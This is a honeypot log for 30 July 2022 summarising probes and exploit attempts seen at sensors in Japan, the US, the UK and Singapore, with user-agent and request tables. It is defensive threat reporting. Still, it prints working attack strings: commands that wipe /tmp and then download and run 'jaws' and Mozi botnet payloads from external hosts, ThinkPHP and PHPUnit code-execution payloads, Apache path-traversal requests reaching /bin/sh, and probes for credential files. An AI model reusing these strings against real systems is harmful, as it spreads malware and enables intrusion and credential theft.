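Honeypot (tentative) observation log for 2022/07/30.
Highlights
Common
Access targeting the Apache HTTP Server vulnerability (CVE-2021-41773)
Access targeting a vulnerability in GPON routers
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting the Spring Cloud Gateway vulnerability (CVE-2022-22947)
Access targeting a vulnerability in ThinkPHP
Scanning for /.env
Scanning for Apache Solr
Scanning for Laravel
Location:JP
The following were observed:
Access targeting a vulnerability in NetGear products
Scanning with aiohttp
Scanning with zgrab
Scanning for .js files
Scanning for /.aws
Scanning for /.git
Access with the User-Agent "Hello, World"
The following access to /shell was observed:
cd /tmp; rm -rf *; wget rischyo.cf/jaws; sh /tmp/jaws
Location:US
The following was observed:
Malicious traffic related to 5.188.210.227
Location:UK
The following were observed:
Access targeting a vulnerability in D-link products
Access targeting a vulnerability in NetGear products
Scanning for /.git
The following access to /shell was observed:
cd /tmp; rm -rf *; wget qwugdsabbdsdeeeeb212c.bydthkk.top/jaws; sh /tmp/jaws
Location:SG
The following were observed:
Access targeting a vulnerability in D-link products
Scanning with curl
Scanning with zgrab
Scanning for .css files
Scanning for /.git
Scanning for phpMyAdmin
Access with the User-Agent "Hello, World"
Access with the User-Agent "Hello, world"
The following access to /shell was observed:
cd /tmp; rm -rf *; wget 2.56.57.238/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget networkmapping.xyz/jaws; sh /tmp/jaws
Other
Access count trend
JP: total accesses: 229 (change from previous day: 145)
US: total accesses: 49 (change from previous day: -87)
UK: total accesses: 42 (change from previous day: -66)
SG: total accesses: 109 (change from previous day: 34)
For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.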
Location:JP
Source IP address list
User-Agent list
Count | UserAgent |
---|---|
10 | - |
1 | Hello, World |
1 | MMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 |
38 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 |
8 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
11 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
1 | Python/3.7 aiohttp/3.7.4.post0 |
1 | facebookexternalhit/1.1 (+http[:]//www[.]facebook[.]com/externalhit_uatext.php) |
142 | python-requests/2.28.1 |
1 | python-urllib3/1.26.9 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | | |
1 | MGLNDD_18.179.20.5_80\n | | |
1 | \x16\x03\x01\x01C\x01 | | |
3 | \x16\x03\x01 | | |
1 | GET | /.aws/credentials | HTTP/1.1 |
40 | GET | /.env | HTTP/1.1 |
1 | GET | //.aws/credentials | HTTP/1.1 |
1 | GET | //.env.bak | HTTP/1.1 |
1 | GET | //.git/config | HTTP/1.1 |
1 | GET | //.phpinfo | HTTP/1.1 |
1 | GET | //.travis.yml | HTTP/1.1 |
1 | GET | //123[.]php | HTTP/1.1 |
1 | GET | //?p=info | HTTP/1.1 |
1 | GET | //?p=php | HTTP/1.1 |
1 | GET | //?phpinfo.php | HTTP/1.1 |
1 | GET | //?phpinfo=1 | HTTP/1.1 |
1 | GET | //?phpinfo | HTTP/1.1 |
1 | GET | //?q=info | HTTP/1.1 |
1 | GET | //_profiler/phpinfo/info.php | HTTP/1.1 |
1 | GET | //_profiler/phpinfo/phpinfo.php | HTTP/1.1 |
1 | GET | //_profiler/phpinfo | HTTP/1.1 |
1 | GET | // | HTTP/1.1 |
1 | GET | //a[.]php | HTTP/1.1 |
1 | GET | //admin/info.php | HTTP/1.1 |
1 | GET | //admin/phpinfo.php | HTTP/1.1 |
1 | GET | //adminphp[.]php/configuration.php | HTTP/1.1 |
1 | GET | //apache/i.php | HTTP/1.1 |
1 | GET | //apache/info.php | HTTP/1.1 |
1 | GET | //apache/phpinfo.php | HTTP/1.1 |
1 | GET | //apache2[.]php | HTTP/1.1 |
1 | GET | //apache[.]php | HTTP/1.1 |
1 | GET | //asdf[.]php | HTTP/1.1 |
1 | GET | //aws-secret.yaml | HTTP/1.1 |
1 | GET | //aws[.]yml | HTTP/1.1 |
1 | GET | //build[.]php | HTTP/1.1 |
1 | GET | //cache[.]php | HTTP/1.1 |
1 | GET | //config/cache.php | HTTP/1.1 |
1 | GET | //config[.]js | HTTP/1.1 |
1 | GET | //dashboard/i.php | HTTP/1.1 |
1 | GET | //dashboard/info.php | HTTP/1.1 |
1 | GET | //dashboard/phpinfo.php | HTTP/1.1 |
1 | GET | //dashboard/test.php | HTTP/1.1 |
1 | GET | //debug/default/view?panel=config | HTTP/1.1 |
1 | GET | //dep[.]php | HTTP/1.1 |
1 | GET | //deploy[.]php | HTTP/1.1 |
2 | GET | //dev[.]php | HTTP/1.1 |
1 | GET | //developer[.]php | HTTP/1.1 |
1 | GET | //devs[.]php | HTTP/1.1 |
1 | GET | //env[.]template | HTTP/1.1 |
1 | GET | //frontend_dev[.]php/$ | HTTP/1.1 |
1 | GET | //i[.]php | HTTP/1.1 |
1 | GET | //in[.]php | HTTP/1.1 |
1 | GET | //index1[.]php | HTTP/1.1 |
1 | GET | //index[.]php | HTTP/1.1 |
1 | GET | //inf[.]php | HTTP/1.1 |
1 | GET | //info1[.]php | HTTP/1.1 |
1 | GET | //info2[.]php | HTTP/1.1 |
1 | GET | //info3[.]php | HTTP/1.1 |
1 | GET | //info4[.]php | HTTP/1.1 |
2 | GET | //info[.]php | HTTP/1.1 |
2 | GET | //infophp[.]php | HTTP/1.1 |
1 | GET | //infos[.]php | HTTP/1.1 |
1 | GET | //ini[.]php | HTTP/1.1 |
1 | GET | //isadmin[.]php | HTTP/1.1 |
1 | GET | //jo[.]php | HTTP/1.1 |
1 | GET | //l[.]php | HTTP/1.1 |
1 | GET | //lindex[.]php | HTTP/1.1 |
1 | GET | //linusadmin-phpinfo.php | HTTP/1.1 |
1 | GET | //main[.]yml | HTTP/1.1 |
1 | GET | //new[.]php | HTTP/1.1 |
1 | GET | //o[.]php | HTTP/1.1 |
1 | GET | //ocp[.]php | HTTP/1.1 |
1 | GET | //of[.]php | HTTP/1.1 |
1 | GET | //old_phpinfo[.]php | HTTP/1.1 |
1 | GET | //p[.]php | HTTP/1.1 |
1 | GET | //php-info.php | HTTP/1.1 |
1 | GET | //php1[.]php | HTTP/1.1 |
1 | GET | //php52/phpinfo.php | HTTP/1.1 |
1 | GET | //php[.]ini | HTTP/1.1 |
1 | GET | //php[.]php | HTTP/1.1 |
1 | GET | //php_info[.]php | HTTP/1.1 |
1 | GET | //phpcustom_info/phpinfo.php | HTTP/1.1 |
1 | GET | //phpinfo/info.php | HTTP/1.1 |
1 | GET | //phpinfo/phpinfo.php | HTTP/1.1 |
1 | GET | //phpinfo1[.]php | HTTP/1.1 |
1 | GET | //phpinfo2[.]php | HTTP/1.1 |
1 | GET | //phpinfo3[.]php | HTTP/1.1 |
1 | GET | //phpinfo4[.]php | HTTP/1.1 |
1 | GET | //phpinfo[.]html | HTTP/1.1 |
1 | GET | //phpinfo[.]php3 | HTTP/1.1 |
1 | GET | //phpinfo[.]php4 | HTTP/1.1 |
1 | GET | //phpinfo[.]php5 | HTTP/1.1 |
2 | GET | //phpinfo[.]php | HTTP/1.1 |
1 | GET | //phpinfo[.]txt | HTTP/1.1 |
2 | GET | //phpinfo | HTTP/1.1 |
1 | GET | //phpinfodev[.]php | HTTP/1.1 |
1 | GET | //phpinfos[.]php | HTTP/1.1 |
1 | GET | //phpsysinfo/info.php | HTTP/1.1 |
1 | GET | //phpsysinfo/phpinfo.php | HTTP/1.1 |
1 | GET | //phpsysinfo/phpsysinfo.php | HTTP/1.1 |
1 | GET | //phpsysinfo[.]php | HTTP/1.1 |
1 | GET | //phpsysinfo | HTTP/1.1 |
1 | GET | //phptest[.]php | HTTP/1.1 |
1 | GET | //phpversion[.]php | HTTP/1.1 |
1 | GET | //pi[.]php5 | HTTP/1.1 |
1 | GET | //pi[.]php | HTTP/1.1 |
1 | GET | //pinfo[.]php | HTTP/1.1 |
1 | GET | //q[.]php | HTTP/1.1 |
1 | GET | //qq[.]php | HTTP/1.1 |
1 | GET | //rest[.]php | HTTP/1.1 |
1 | GET | //s3[.]js | HTTP/1.1 |
1 | GET | //server/s3.js | HTTP/1.1 |
1 | GET | //settings[.]py | HTTP/1.1 |
1 | GET | //temp[.]php | HTTP/1.1 |
1 | GET | //test123[.]php | HTTP/1.1 |
1 | GET | //test1[.]php | HTTP/1.1 |
1 | GET | //test1 | HTTP/1.1 |
1 | GET | //test2[.]php | HTTP/1.1 |
1 | GET | //test3[.]php | HTTP/1.1 |
1 | GET | //test4[.]php | HTTP/1.1 |
1 | GET | //test5[.]php | HTTP/1.1 |
1 | GET | //test6[.]php | HTTP/1.1 |
1 | GET | //test7[.]php | HTTP/1.1 |
1 | GET | //test8[.]php | HTTP/1.1 |
1 | GET | //test9[.]php | HTTP/1.1 |
1 | GET | //test[.]php | HTTP/1.1 |
1 | GET | //test_info1[.]php | HTTP/1.1 |
1 | GET | //test_info2[.]php | HTTP/1.1 |
1 | GET | //test_info3[.]php | HTTP/1.1 |
1 | GET | //test_info4[.]php | HTTP/1.1 |
1 | GET | //test_info5[.]php | HTTP/1.1 |
1 | GET | //test_info[.]php | HTTP/1.1 |
1 | GET | //test_phpinfo1[.]php | HTTP/1.1 |
1 | GET | //test_phpinfo2[.]php | HTTP/1.1 |
1 | GET | //test_phpinfo3[.]php | HTTP/1.1 |
1 | GET | //test_phpinfo4[.]php | HTTP/1.1 |
1 | GET | //test_phpinfo5[.]php | HTTP/1.1 |
1 | GET | //test_phpinfo[.]php | HTTP/1.1 |
1 | GET | //tester[.]php | HTTP/1.1 |
1 | GET | //testing[.]php | HTTP/1.1 |
1 | GET | //time[.]php | HTTP/1.1 |
1 | GET | //token[.]php | HTTP/1.1 |
1 | GET | //tz[.]php | HTTP/1.1 |
1 | GET | //u[.]php | HTTP/1.1 |
1 | GET | //up[.]php | HTTP/1.1 |
1 | GET | //w[.]php | HTTP/1.1 |
1 | GET | //web[.]php | HTTP/1.1 |
1 | GET | //wp-config.old | HTTP/1.1 |
1 | GET | //wp-config.php.backup | HTTP/1.1 |
1 | GET | //wp-config.php.bak | HTTP/1.1 |
1 | GET | //wp-config.txt | HTTP/1.1 |
1 | GET | //wp[.]php | HTTP/1.1 |
1 | GET | //wpp-config.php~ | HTTP/1.1 |
1 | GET | //x[.]php | HTTP/1.1 |
1 | GET | /0bef | HTTP/1.0 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/gateway/routes | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//58[.]255[.]210[.]194:49035/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ rischyo.cf/jaws;sh+/tmp/jaws | |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /stream?streams=btcusdt@depth | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
8 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/bin/sh | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /owa | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
Source IP address list
User-Agent list
Count | UserAgent |
---|---|
14 | - |
5 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
12 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | | |
1 | MGLNDD_34.68.118.83_80\n | | |
6 | \x03 | | |
1 | \x16\x03\x01\x01C\x01 | | |
2 | \x16\x03\x01 | | |
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 | X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
18 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/gateway/routes | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin | HTTP/1.0 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
3 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | PRI | * | HTTP/2.0 |
Location:UK
Source IP address list
User-Agent list
Count | UserAgent |
---|---|
13 | - |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
1 | Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330 |
7 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
5 | \"Mozilla/5.0 |
1 | python-requests/2.25.1 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n | | |
2 | \x03 | | |
1 | \x16\x03\x01\x01C\x01 | | |
1 | \x16\x03\x01 | | |
2 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/gateway/routes | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user | HTTP/1.0 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /evox/about | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /fuN3 | HTTP/1.0 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /nmaplowercheck1659081576 | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//103[.]181[.]57[.]133:35105/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws | |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
2 | POST | /HNAP1/ | HTTP/1.0 |
7 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | PRI | * | HTTP/2.0 |
Location:SG
Source IP address list
User-Agent list
Count | UserAgent |
---|---|
16 | - |
1 | Hello, World |
2 | Hello, world |
1 | Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 |
1 | Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 630) like Gecko |
25 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
43 | curl/7.54.0 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | | |
1 | MGLNDD_13.67.44.234_80 | | |
2 | \x03 | | |
1 | \x16\x03\x01\x01D\x01 | | |
1 | \x16\x03\x01\x02 | | |
3 | \x16\x03\x01 | | |
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 | X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
25 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/HEAD | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 | HTTP/1.1 |
1 | GET | /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | HTTP/1.1 |
1 | GET | /CSS/Miniweb.css | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
1 | GET | /JUdY | HTTP/1.1 |
1 | GET | /LGupRhAvBNgcmoZUW2KjfeMak66 | HTTP/1.1 |
1 | GET | /Portal/Portal.mwsl | HTTP/1.1 |
1 | GET | /Portal0000.htm | HTTP/1.1 |
1 | GET | /ReportServer | HTTP/1.1 |
1 | GET | /__Additional | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/gateway/routes | HTTP/1.1 |
1 | GET | /base.jhtml | HTTP/1.1 |
1 | GET | /base.jsa | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /default.asp | HTTP/1.1 |
1 | GET | /default.cgi | HTTP/1.1 |
1 | GET | /default.jhtml | HTTP/1.1 |
1 | GET | /default.jsp | HTTP/1.1 |
1 | GET | /docs/cplugError.html/ | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /home.asp | HTTP/1.1 |
1 | GET | /home.html | HTTP/1.1 |
1 | GET | /home.php | HTTP/1.1 |
1 | GET | /index.aspx | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /index.shtml | HTTP/1.1 |
1 | GET | /inicio.asp | HTTP/1.1 |
1 | GET | /inicio.jhtml | HTTP/1.1 |
1 | GET | /inicio.jsa | HTTP/1.1 |
1 | GET | /localstart.html | HTTP/1.1 |
1 | GET | /main.cfm | HTTP/1.1 |
1 | GET | /main.html | HTTP/1.1 |
1 | GET | /main.shtml | HTTP/1.1 |
1 | GET | /menu.html | HTTP/1.1 |
1 | GET | /menu.jhtml | HTTP/1.1 |
1 | GET | /menu.php | HTTP/1.1 |
1 | GET | /nmaplowercheck1659101124 | HTTP/1.1 |
2 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /pools/default/buckets | HTTP/1.1 |
1 | GET | /pools | HTTP/1.1 |
1 | GET | /readme.txt | HTTP/1.1 |
1 | GET | /server-status | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+2[.]56[.]57[.]238/jaws;sh+/tmp/jaws | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /start.cfm | HTTP/1.1 |
1 | GET | /start.jsp | HTTP/1.1 |
1 | GET | /start.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
6 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
1 | POST | /scripts/WPnBr.dll | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
4 | PRI | * | HTTP/2.0 |